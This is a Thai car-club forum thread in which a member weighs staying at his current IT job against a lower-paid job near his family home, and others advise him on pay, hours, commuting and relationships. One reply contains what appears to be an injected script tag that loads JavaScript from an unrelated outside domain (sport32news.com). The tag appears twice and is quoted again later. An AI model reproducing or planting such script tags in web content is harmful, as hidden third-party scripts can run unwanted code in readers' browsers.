ตอบ
ที่เก่า หรือ ที่ใหม่
ที่เก่า
84%
 84%  [ 11 ]
ที่ใหม่
15%
 15%  [ 2 ]
คะแนนทั้งหมด : 13
top_es

เข้าร่วม: 01 กุมภา 2010
ตอบ: 842

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 40

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 มกรา 2012 11:29 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล้ว
นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ"

ก่อนนี้ผมเคยมีปัญหาเรื่องการทำงานคือ ผมทำงานย่านรังสิต แต่มีเหตุจำเป็นอย่างหลีกเลี่ยงไม่ได้ที่จะต้องกลับบ้านทุกวัน ซึ่งบ้านผมอยู่ปราจีน

เลยมีความคิดว่าจะหางานใหม่ จนวันนี้ ผมได้งานใหม่แล้ว อยู่ที่ปราจีนด้วย

แต่
+ ที่เก่า เดือนเมษาก็จะคบปีแล้ว

+ ที่ใหม่ได้เงินเดือนน้อยกว่า ที่เดิม 1700 บาท แต่ทำงาน จัน ถึงเสา
+ ที่เก่าทำงานจันถึงเสา แต่เสาเว้นเสา

+ ทำที่ใหม่ อาจได้เจอแฟนเฉพาะ วันอาทิดอย่างเดียว
+ ทำที่เก่า อาจได้เจอแฟน หลังเลิกงานทุกวัน
(แฟนผมทำงานธรรมศาสตร์)

+ การเดินทาง ที่เก่า หากขัย es สุดหล่อไป ก็ 35-40 กิโล
+ การเดินทาง ที่เก่า ก็ 110-120 กิโล แต่บางวันนั่งรถตู้ ไปกลับก็ 190 (es เติทก็น 4 ร้อยกว่าๆ)

พี่ๆว่าผมจะทำไงดีคับ จะไปทำที่ใหม่ หรือจะทำที่เก่าดี

วันนี้คุยกะ HR ที่ใหม่ ตกลงว่าผมเข้าใจผิด เขาบอกว่าทำแค่ จัน ถึง เสา เสาเว้นเสา เหมือนที่เดิม ยังไงละทีนี้ เครียดมาก

Attached File :
นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล้ว

แก้ไขล่าสุดโดย เมื่อ จันทร์, 16 มกรา 2012 16:56, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Makai 
adisak

ชื่อเล่น: ปอง

เข้าร่วม: 06 พฤศจิกา 2008
ตอบ: 1675

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 1327

ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 11 มกรา 2012 12:02 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าสิทอป ได้เจอแฟนทู้กวัน <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: top_es 
a_ten

ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ปี: 2003
พุธ, 11 มกรา 2012 13:22 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าดีกว่านะคับ ทนขับรถไกลหน่อยแต่ได้เจอแฟนทุกวัน
top_es

Guru ES
Guru ES

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 มกรา 2012 13:25 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
adisak พิมพ์ว่า:
ที่เก่าสิทอป ได้เจอแฟนทู้กวัน <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

a_ten พิมพ์ว่า:
ที่เก่าดีกว่านะคับ ทนขับรถไกลหน่อยแต่ได้เจอแฟนทุกวัน

ผมก็คิดแบบนั้นอะ แต่ที่บ้านอยากให้ทำที่ใหม่อะพี่ อึดอัดมาก ตอนนี้
Hell_Boy

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 557

ได้รับคำขอบคุณ: 1868
ให้คำขอบคุณ: 142
พุธ, 11 มกรา 2012 13:30 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าฮับ
top_es

Guru ES
Guru ES

พุธ, 11 มกรา 2012 13:34 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
Hell_Boy พิมพ์ว่า:
ที่เก่าฮับ

ทำไมถึงว่าทีเก่าละคับ อยากทราบความคิดเห็น

เอาตรงๆนะ ใจผมอะ เหนื่อยผมยอม ท้อผมบ่น ก็แค่นั้น อยากอยู่ใกล้แฟนอะ

ยังไงดีเนี่ย
arm2517

ชื่อเล่น: อาร์ม

เข้าร่วม: 21 ตุลา 2008
ตอบ: 554

ได้รับคำขอบคุณ: 575
ให้คำขอบคุณ: 3231

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 11 มกรา 2012 13:35 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
top_es พิมพ์ว่า:
นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ"

ก่อนนี้ผมเคยมีปัญหาเรื่องการทำงานคือ ผมทำงานย่านรังสิต แต่มีเหตุจำเป็นอย่างหลีกเลี่ยงไม่ได้ที่จะต้องกลับบ้านทุกวัน ซึ่งบ้านผมอยู่ปราจีน

เลยมีความคิดว่าจะหางานใหม่ จนวันนี้ ผมได้งานใหม่แล้ว อยู่ที่ปราจีนด้วย

ที่เก่าดีกว่า
แต่ควรจะปรับเรื่องการกลับบ้านใหม่ อาจเป็นวันเว้นวันหรือสองวันกลับ...ซึ่งก็ต้องดู "แต่มีเหตุจำเป็นอย่างหลีกเลี่ยงไม่ได้ที่จะต้องกลับบ้านทุกวัน " ว่าสามารถปรับได้ไหม
the

ชื่อเล่น: ธี

เข้าร่วม: 30 กันยา 2010
ตอบ: 405

ได้รับคำขอบคุณ: 276
ให้คำขอบคุณ: 153

ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 11 มกรา 2012 13:36 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ผมว่าความจำเป็นที่บ้านที่ไม่สามารถเลี่ยงได้เนี่ย สำคัญแค่ไหน ระยะเวลานานแค่ไหนมากกว่า
เลื่อก จำเป็น+เร่งด่วน เป็นอันดับ1
เลือก จำเป็น+ไม่เร่งด่วน อันดับ 2
ถ้าเข้าข้อแรกทั้งสองอัน ผมว่าครอบครัวสำคัญกว่าแฟนนะ
ได้รับคำขอบคุณจาก: top_es  Phetcharat 
top_es

Guru ES
Guru ES

พุธ, 11 มกรา 2012 13:40 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
the พิมพ์ว่า:
ผมว่าความจำเป็นที่บ้านที่ไม่สามารถเลี่ยงได้เนี่ย สำคัญแค่ไหน ระยะเวลานานแค่ไหนมากกว่า
เลื่อก จำเป็น+เร่งด่วน เป็นอันดับ1
เลือก จำเป็น+ไม่เร่งด่วน อันดับ 2
ถ้าเข้าข้อแรกทั้งสองอัน ผมว่าครอบครัวสำคัญกว่าแฟนนะ

คืองี้คับ ที่บ้านมีกิจการของครอบครัวนะคับ พ่อแม่เลยอยากให้ช่วยดู ผมเลยต้องไปกลับ

แต่ถามว่า ถ้าผมจะพักที่ กรุงเทพได้ไม เขาก็ไม่ได้ว่าอะไร

แต่พอเขาทราบเรื่องว่าผมได้โอกาส ที่ใหม่นี้เขาเลยอยากให้ผม ทำแถวบ้าน นะคับ
wangyu

ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 11 มกรา 2012 13:44 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ถ้าคุณเป็นผู้ชาย ลั่นล้า แล้วล่ะก็
ที่ใหม่ครับ สมบูรณ์แบบที่สุดครับ

hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พุธ, 11 มกรา 2012 13:48 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ใช่คนเดียวกับที่บ้านทำหอพักอยู่ปราจีนรึป่าวคับ
ohmz1541

ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

พุธ, 11 มกรา 2012 13:52 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ถามตัวเองสิคับเรื่องแบบนี้ ต่างคนต่างวาระครับ
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พุธ, 11 มกรา 2012 13:53 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าคับบบ ได้เจอแฟน ได้พักเยอะกว่า เงินมากกว่า

ที่ใหม่ เงินน้อยกว่าแถมทำงานทุกวันเสาร์ เหมือนไม่ได้พักหรอกคับ แค่วันเดียว
top_es

Guru ES
Guru ES

พุธ, 11 มกรา 2012 14:03 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
hacker พิมพ์ว่า:
ใช่คนเดียวกับที่บ้านทำหอพักอยู่ปราจีนรึป่าวคับ

ไช่คับ
cisco พิมพ์ว่า:
ที่เก่าคับบบ ได้เจอแฟน ได้พักเยอะกว่า เงินมากกว่า

ที่ใหม่ เงินน้อยกว่าแถมทำงานทุกวันเสาร์ เหมือนไม่ได้พักหรอกคับ แค่วันเดียว

แต่ที่เก่า ออกบ้าน 6.00 ถึงบ้าน 21.00 ทุกวันเลยคับ
the

ชื่อเล่น: ธี

เข้าร่วม: 30 กันยา 2010
ตอบ: 405

ได้รับคำขอบคุณ: 276
ให้คำขอบคุณ: 153

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 11 มกรา 2012 14:14 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
cisco พิมพ์ว่า:

แดงว่าเรื่องที่บ้านไม่ด่วน อยากเหนหน้าลูกบ่อยๆบ้าง
เหตุผลงานใหม่ เปนเหตุผลที่พูดได้ว่ามันไม่ดีเรยคับเงินน้อยลง ไม่ก้าวหน้า อยู่กุงเทพมีช่องทางอะไรที่มากกว่าก็พูดไป ต้องพยายามอธิบายคับ เร่งให้ที่บ้านเข้าใจยังไงเขาก็ไม่ฟังคับ อารมจะขึ้นก็นิ่งเสียตำลึงทองคับ
อยู่กทมไปเรยคับ ไปกลับ อตร
โทรหาที่บ้านบ่อยขึ้นหน่อย หาเวลาเยี่ยมที่บ้านบ้างซื้อของฝากพาแฟนไปเที่ยวที่บ้าน น่าจะทำให้ที่บ้านน้อยใจน้อยลงได้คับ
ช่วงนี้กลับบ้านบ่อยนิดนึงคับ ทำให้ที่บ้านเหนว่าเราห่วงความรู้สึกเขาเหมือนกัน
ลองหางานใหม่ที่มีวันหยุดเยอะกว่าทำ เผื่อว่าวันหยุดจะได้ช่วยงานที่บ้านบ้างก็ยังดี
อธิบายให้แฟนเข้าใจด้วยจะได้เปนกะลังใจของเราด้วย แฟนกันร่วมสุขก็ต้องร่วมทุกข์ด้วย
บางทีงานที่บ้านอาจจะเป็นงานที่มั่งคงกับเราที่สุดก็ได้คับ เหนื่อยหน่อยสู้สู้
ICE@WIN

ชื่อเล่น: ต้น

เข้าร่วม: 21 มีนา 2010
ตอบ: 2263

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 1134

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 11 มกรา 2012 14:26 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
tong-mc

ชื่อเล่น: โต้ง

เข้าร่วม: 19 พฤศจิกา 2010
ตอบ: 198

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 172
ให้คำขอบคุณ: 202

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 11 มกรา 2012 14:30 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
สำหรับความคิดผม ที่เก่าคับครอบครัวต้องมาก่อน แต่ให้เลือกจริงๆก็ลำบากใจนะคับ
honeybeex7

เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
พุธ, 11 มกรา 2012 14:32 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าครับ เพราะผมชอบยึดติดกับอะไรที่มันเดิมๆ ดูดี
civic3025

ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ปี: 2001
พุธ, 11 มกรา 2012 14:34 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
รักแท้แพ้ใกล้ชิดนะคับ โดนมาแล้วหุๆๆ
mark_es03

ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 11 มกรา 2012 15:03 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
honeybeex7 พิมพ์ว่า:
ที่เก่าครับ เพราะผมชอบยึดติดกับอะไรที่มันเดิมๆ ดูดี

ผมนึกว่าพี่ชอบของใหม่ๆเอ๊าะๆเปลี่ยนบ่อยๆซะอีก คริๆ
ได้รับคำขอบคุณจาก: top_es  honeybeex7 
makham

เข้าร่วม: 07 ตุลา 2010
ตอบ: 566

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 353

พุธ, 11 มกรา 2012 15:11 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ถ้าเป็นผมนะครับ...ผมจะทำที่เก่าครับ เพราะ

1 เงินเดือนสูงกว่า
2มีวันหยุดมากกว่า
3ได้ใกล้ชิดกับคนที่เรารัก(แฟน)และรักเรา(รึเปล่า)มากกว่า
4นี่ก้อทำงานจะครบปีแล้ว...โอกาสการเลื่อนขั้นหรือเพิ่มเงินเดือนก้อเป็นไปได้ดีกว่า

เมื่อเทียบกับที่ใหม่แล้วข้อดีมีอย่างเดียว(เท่าที่ฟังดูครับ)คือ ใกล้บ้าน แต่ผมว่า คุณมีคำตอบในใจแล้วล่ะแต่ยังลังเลนิดหน่อย
ลองให้เวลากับตัวเองสักระยะ...แล้วจะเจอคำตอบที่คุณต้องการจริงๆ...

ปล.รถสวยครับ
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 11 มกรา 2012 15:21 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่เก่าและที่ใหม่ ทำงานตำแหน่งเดียวกันเลยไหมครับ ไปที่ใหม่บางทีก็อาจคิดผิดในเรื่องสภาพแวดล้อมเพื่อนร่วมงานอ่ะครับ
Nut_Au_Together

ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
พุธ, 11 มกรา 2012 15:26 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ผมเอาที่เก่าครับ เพราะได้เจอเเฟนทุกวัน บางครั้งคนเราทำเเต่งานมากเกินไป จนอาจจะลืมใส่ใจคนรอบข้างมันก็อาจจะไม่ดีครับ

ปล.ไม่ได้ว่าใครนะครับ เเต่ผมเคยเป็นเเบบนั้น
top_es

Guru ES
Guru ES

พุธ, 11 มกรา 2012 15:27 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
civic3025 พิมพ์ว่า:
รักแท้แพ้ใกล้ชิดนะคับ โดนมาแล้วหุๆๆ

กลัวเหมือนกันคับเรื่องนี้
makham พิมพ์ว่า:
ถ้าเป็นผมนะครับ...ผมจะทำที่เก่าครับ เพราะ

1 เงินเดือนสูงกว่า
2มีวันหยุดมากกว่า
3ได้ใกล้ชิดกับคนที่เรารัก(แฟน)และรักเรา(รึเปล่า)มากกว่า
4นี่ก้อทำงานจะครบปีแล้ว...โอกาสการเลื่อนขั้นหรือเพิ่มเงินเดือนก้อเป็นไปได้ดีกว่า

เมื่อเทียบกับที่ใหม่แล้วข้อดีมีอย่างเดียว(เท่าที่ฟังดูครับ)คือ ใกล้บ้าน แต่ผมว่า คุณมีคำตอบในใจแล้วล่ะแต่ยังลังเลนิดหน่อย
ลองให้เวลากับตัวเองสักระยะ...แล้วจะเจอคำตอบที่คุณต้องการจริงๆ...

ปล.รถสวยครับ

ใจผมตอนนี้นะ ที่เก่าคับ แฟมผม ผมรักมัน เรื่องเงินก็อยากมีเก็บนะ คิดว่าทำที่ใหม่น่าจะมีเก็บมากกว่า
Icestonezaa

ชื่อเล่น: ไอซ์

เข้าร่วม: 25 พฤศจิกา 2011
ตอบ: 56

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 18

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 11 มกรา 2012 15:38 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
Oo-kakachi-oO

ชื่อเล่น: จ๊อตครับ

เข้าร่วม: 02 มิถุนา 2010
ตอบ: 597

ได้รับคำขอบคุณ: 1013
ให้คำขอบคุณ: 814

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 11 มกรา 2012 17:03 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
อืมส์ . . . ตอบยาก ถามก่อนว่า งานที่เก่า กับที่ใหม่ เนื้องานต่างกันแค่ไหน ความรับผิดชอบ โอกาศเติบโต ความก้าวหน้า รวมถึง การต่อยอดในงานที่ทำเช่น ออกมาเปิด บริษัทเอง . . . เรื่องครอบครัวและแฟน ขอเป็นประเด็นรองก่อนเนอะ ผมว่า ถ้าเข้าใจเพื่ออนาคตที่ดีกว่าได้เนี่ย น่าจะยอมรับได้นะ
.
ใช่ที่บ้านทำหอพักรึปล่าวครับ ธุรกิจครอบครัว ก็ต้องดูแลด้วย คิดหนักนะเนี่ย
.
ขอยกตัวอย่างผมนิดนึง . . . เดิมที จบมา ก็ทำงานบริษัทนึงในตำแหน่งสถาปนิก จนกระทั่งเกิดวิกฤต จวนเจียนจะตกงาน พอดี พี่สาว ให้มาสอบการประปา จะได้กลับมาอยู่บ้าน ก็เลยสอบ ไม่ได้เป็นพนักงาน เป็นลูกจ้าง อยู่ 4 ปี ประจำอยู่สมุทรสงคราม จนสอบได้บรรจุเป็นช่างโยธา . . . ที่นี้ มีตัวเลือก ระหว่า ไปอยู่ส่วนกลาง หลักสี่ เพราะ ส่วนกลางต้องการคนเป็นสถาปนิก กับ ไปอยู่อำเภอเดิมบางนางบวช จังหวัดสุพรรณบุรี . . . สองที่ ต่างกันมาก ส่วนกลาง อยู่ในเมือง ออกพื้นที่เบิกเบี้ยเลี้ยงสบายเลย ใกล้บ้านแฟนด้วย สะดวกทุกอย่าง . . . แต่ผมเลือกเดิมบาง ไกลบ้าน ประมาณ 200 กิโล กลับบ้านก็ อาทิตย์ เว้น อาทิตย์ แฟนก็ เดือนนึงเจอครั้ง ไม่ก็ สองเดือนเจอครั้งเลยทีเดียว แต่ผม ได้งาน ได้ประสบการณ์ ได้ความรู้เพียบ ได้วิธีแก้ปัญหา เพราะประปาเล็กๆ เรื่องเยอะ ผมอยู่มาสองปี จนได้ย้ายกลับภูมิลำเนาอย่างง่ายเลย
.
สุดท้าย ถามใจตัวเองล้วนๆเลยครับ สู้ๆนะครับ
top_es

Guru ES
Guru ES

พุธ, 11 มกรา 2012 17:20 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
Oo-kakachi-oO พิมพ์ว่า:
อืมส์ . . . ตอบยาก ถามก่อนว่า งานที่เก่า กับที่ใหม่ เนื้องานต่างกันแค่ไหน ความรับผิดชอบ โอกาศเติบโต ความก้าวหน้า รวมถึง การต่อยอดในงานที่ทำเช่น ออกมาเปิด บริษัทเอง . . . เรื่องครอบครัวและแฟน ขอเป็นประเด็นรองก่อนเนอะ ผมว่า ถ้าเข้าใจเพื่ออนาคตที่ดีกว่าได้เนี่ย น่าจะยอมรับได้นะ
.
ใช่ที่บ้านทำหอพักรึปล่าวครับ ธุรกิจครอบครัว ก็ต้องดูแลด้วย คิดหนักนะเนี่ย
.
ขอยกตัวอย่างผมนิดนึง . . . เดิมที จบมา ก็ทำงานบริษัทนึงในตำแหน่งสถาปนิก จนกระทั่งเกิดวิกฤต จวนเจียนจะตกงาน พอดี พี่สาว ให้มาสอบการประปา จะได้กลับมาอยู่บ้าน ก็เลยสอบ ไม่ได้เป็นพนักงาน เป็นลูกจ้าง อยู่ 4 ปี ประจำอยู่สมุทรสงคราม จนสอบได้บรรจุเป็นช่างโยธา . . . ที่นี้ มีตัวเลือก ระหว่า ไปอยู่ส่วนกลาง หลักสี่ เพราะ ส่วนกลางต้องการคนเป็นสถาปนิก กับ ไปอยู่อำเภอเดิมบางนางบวช จังหวัดสุพรรณบุรี . . . สองที่ ต่างกันมาก ส่วนกลาง อยู่ในเมือง ออกพื้นที่เบิกเบี้ยเลี้ยงสบายเลย ใกล้บ้านแฟนด้วย สะดวกทุกอย่าง . . . แต่ผมเลือกเดิมบาง ไกลบ้าน ประมาณ 200 กิโล กลับบ้านก็ อาทิตย์ เว้น อาทิตย์ แฟนก็ เดือนนึงเจอครั้ง ไม่ก็ สองเดือนเจอครั้งเลยทีเดียว แต่ผม ได้งาน ได้ประสบการณ์ ได้ความรู้เพียบ ได้วิธีแก้ปัญหา เพราะประปาเล็กๆ เรื่องเยอะ ผมอยู่มาสองปี จนได้ย้ายกลับภูมิลำเนาอย่างง่ายเลย
.
สุดท้าย ถามใจตัวเองล้วนๆเลยครับ สู้ๆนะครับ

ขอบคุณพี่มากคับ

ผมก็สังสัยตัวเองอยู่ ก่อนนี้หางานในปราจีนแทบตายคับ แต่พอได้ลับไม่อยากไปทำ เพราะ ต้องทำงานวันเสาทุกเสา และ ต้องไกลแฟน

เรื่องประสบการณ์ บอกก่อนเลยคับ ผมทำงานด้าน IT
ที่เก่า ปัจจุบัน เขียน vb6 เป็นหลัก อนาคตน่าเป็นได้รับโปรเจ๊คอื่นเรื่อยๆคับ
ส่วนที่ใหม่เขาบอกว่า คงต้องเป็นทั้ง Programmer และ IT Support คับ

ในคลับเรามีคนทำงานอยู่ที่ใหม่ที่ผทลังเลอยู่ด้วยคับ พี่ที่เคยโดนเรื่องลากิจไม่แจ้งล่วงหน้าอะคับ ที่พี่เขาลาไป meeting นะคับ

โดยรวมผมคิดว่า เรื่องประสบการณ์น่าจะได้พอกัน เรื่องเงินที่ใหม่น่าจะเหลือเก็บเยอะกว่า
เรื่องสวัดดิการพอกันคับ เรื่องส่วนตัวนี่ที่เก่าใกล้แฟนอะ เรื่องเวลา ที่เก่าได้หยุดเสาเว้นเสา ที่ใหม่ทำทุกเสา

ส่วนตัวก็คิดนะคับว่า 1 สัปดาห์ หยุด วันเดียวมันเหมือนไม่ได้พักอะ ไปเที่ยวก็ไม่ได้ เข้าอู่อู่ก็ปิด
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พุธ, 11 มกรา 2012 17:42 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
top_es พิมพ์ว่า:
Oo-kakachi-oO พิมพ์ว่า:
.
.
.

ขอบคุณพี่มากคับ

ผมก็สังสัยตัวเองอยู่ ก่อนนี้หางานในปราจีนแทบตายคับ แต่พอได้ลับไม่อยากไปทำ เพราะ ต้องทำงานวันเสาทุกเสา และ ต้องไกลแฟน

เรื่องประสบการณ์ บอกก่อนเลยคับ ผมทำงานด้าน IT
ที่เก่า ปัจจุบัน เขียน vb6 เป็นหลัก อนาคตน่าเป็นได้รับโปรเจ๊คอื่นเรื่อยๆคับ
ส่วนที่ใหม่เขาบอกว่า คงต้องเป็นทั้ง Programmer และ IT Support คับ

ในคลับเรามีคนทำงานอยู่ที่ใหม่ที่ผทลังเลอยู่ด้วยคับ พี่ที่เคยโดนเรื่องลากิจไม่แจ้งล่วงหน้าอะคับ ที่พี่เขาลาไป meeting นะคับ

โดยรวมผมคิดว่า เรื่องประสบการณ์น่าจะได้พอกัน เรื่องเงินที่ใหม่น่าจะเหลือเก็บเยอะกว่า
เรื่องสวัดดิการพอกันคับ เรื่องส่วนตัวนี่ที่เก่าใกล้แฟนอะ เรื่องเวลา ที่เก่าได้หยุดเสาเว้นเสา ที่ใหม่ทำทุกเสา

ส่วนตัวก็คิดนะคับว่า 1 สัปดาห์ หยุด วันเดียวมันเหมือนไม่ได้พักอะ ไปเที่ยวก็ไม่ได้ เข้าอู่อู่ก็ปิด

ถามผมนะกับตำแหน่งที่ว่า มันจับฉ่ายไปอ่ะ เป็นทั่ง Programmer และ IT Support เกรงว่าจะหนักไปทาง Support มากกว่า

พอจะต่อยอดก็ลำบากล่ะ เพราะมันไม่มุ่งไปทางไหนทางนึงเลย

ผมเคยทำงานโรงงานเล็ก ๆ ที่นึง เป็น Systems Engineer ดูแลระบบ กระทั้งยัน Support เครื่อง เดินสาย LAN ขึ้นฝ้า ปีนตึก ทำทุกอย่าง ถ่าย VDO เวลาออกงาน ติดตั้งเครื่องเสียง

จนถามตัวเองว่าแล้วถ้าไปสมัครงานที่ใหม่จะเอาไรไปตอบ ว่าทำไรมาบ้าง เก่งด้านไหนบ้าง

ยิ่งถ้าเป็นแค่ IT Support อย่างมากเงินเดือนก็ไม่น่าเกิน 15000 จากประสบการณ์นะครับ
ได้รับคำขอบคุณจาก: honeybeex7 
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

พุธ, 11 มกรา 2012 19:12 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
บอกไม่ถูกครับ เรื่องมันอยูที่หลายองค์ประกอบมากๆๆๆ
